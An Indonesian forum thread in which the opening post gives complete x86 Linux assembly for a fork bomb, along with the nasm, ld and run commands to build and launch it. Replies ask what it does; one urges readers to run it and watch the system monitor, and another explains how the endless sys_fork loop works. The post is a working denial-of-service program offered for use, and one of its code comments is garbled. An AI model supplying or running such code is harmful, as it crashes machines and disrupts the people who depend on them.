simple fork bomb

LINUX only

fork.asm

global _start:
_start:
mov eax,0x2 ; 2 syscall ptregs_fork
int 0x80 ; 128 syscall init_module
jmp _start
[/quote]

Compiling with nasm

nasm -f elf fork.asm
[/quote]

linking

ld -o fork fork.o
[/quote]

run

./fork
[/quote]

resiko ditanggung pemenang :stuck_out_tongue:

pertamax

emang ter jadi apa kk

no junk om

coba ja sendiri:asik:

kurang jelas nih om,. POC dong om…

POC = Piye Om Carane?

:seneng:

Ini buat apa? Jelasin keguaannya dong :kesel:
ibaratnya kita ini jadi orang buta yg bodoh dan nggak ngerti apa" :ngambek:

:mantap: omz…
tapi gk d ksih tw cara/fungsi nya… :dead

wah POC kykne ente nemu istilah dari group fb sebelah y…
:ngakak::ngakak:

buat apaan ni omz :smangat:
tolong di jelasin :piss:
tx

tolong di jelasin omzz

linux only :cihuy

wah si om lg iseng nih, mangga di jalanin dulu trus liat ke system monitor yah hahaha. :dead:

dalam pemrograman assembly 32bit, eax atau bisa disebut accumulator register bisa dipakai untuk memanggil system call, dalam kasus ini ts memindahkan nilai 2 kedalam eax yaitu nilai untuk memanggil sys_fork, dan di baris berikutnya ts memanggil kernel call atau syscall untuk mengeksekusi system call tadi, dan di baris berikutnya ts melakukan instruksi jump atau lompatan kepada fungsi _start untuk terjadinya endless loop. dan terjadilah perang garpu :slight_smile:

untuk lebih jelasnya silahkan cek linux syscall tables

1 Like

Wah, share ilmunya yang lain dimari om. :smangat: